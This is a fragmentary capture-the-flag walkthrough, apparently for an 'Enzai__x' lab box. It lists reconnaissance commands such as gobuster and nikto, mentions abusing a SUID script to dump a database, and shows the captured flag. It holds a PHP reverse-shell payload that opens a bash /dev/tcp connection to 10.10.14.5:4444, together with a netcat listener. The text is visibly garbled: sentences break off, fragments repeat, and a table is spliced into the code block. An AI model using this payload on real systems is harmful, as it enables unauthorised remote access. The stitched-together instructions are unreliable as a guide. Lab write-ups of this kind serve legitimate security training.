Enzai__x ❲Pro – How-To❳

The script ( P@ssw0rd! ). We can abuse the SUID to get the database dump (which contains the flag).

| Tool | Command | What it gives you | |------|----------|-------------------| | | gobuster dir -u http://10.10.10.23 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html | Lists hidden directories ( /admin , /uploads , /debug ). | | nikto | nikto -h http://10.10.10.23 | Finds outdated scripts, default files, and common vulnerabilities. | | whatweb | whatweb http://10.10.10.23 | Fingerprints the web app (e.g., “WordPress 5.0”, “PHP 7.2”). | | jsbeautifier (manual) | Open any .js file → run through an online beautifier | May reveal hard‑coded credentials or back‑doors. | enzai__x

Visit the uploaded URL in a browser or curl it: The script ( P@ssw0rd

We find a : /opt/enzai/scripts/ .

```bash # 1️⃣ Create a reverse shell (php-reverse-shell.php) cat > shell.php <<'EOF' <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'"); ?> EOF | Tool | Command | What it gives

nc -lvkp 4444

+----+-----------------------------------+ | id | flag | +----+-----------------------------------+ | 1 | HTBEnzai_X_Exploited! | +----+-----------------------------------+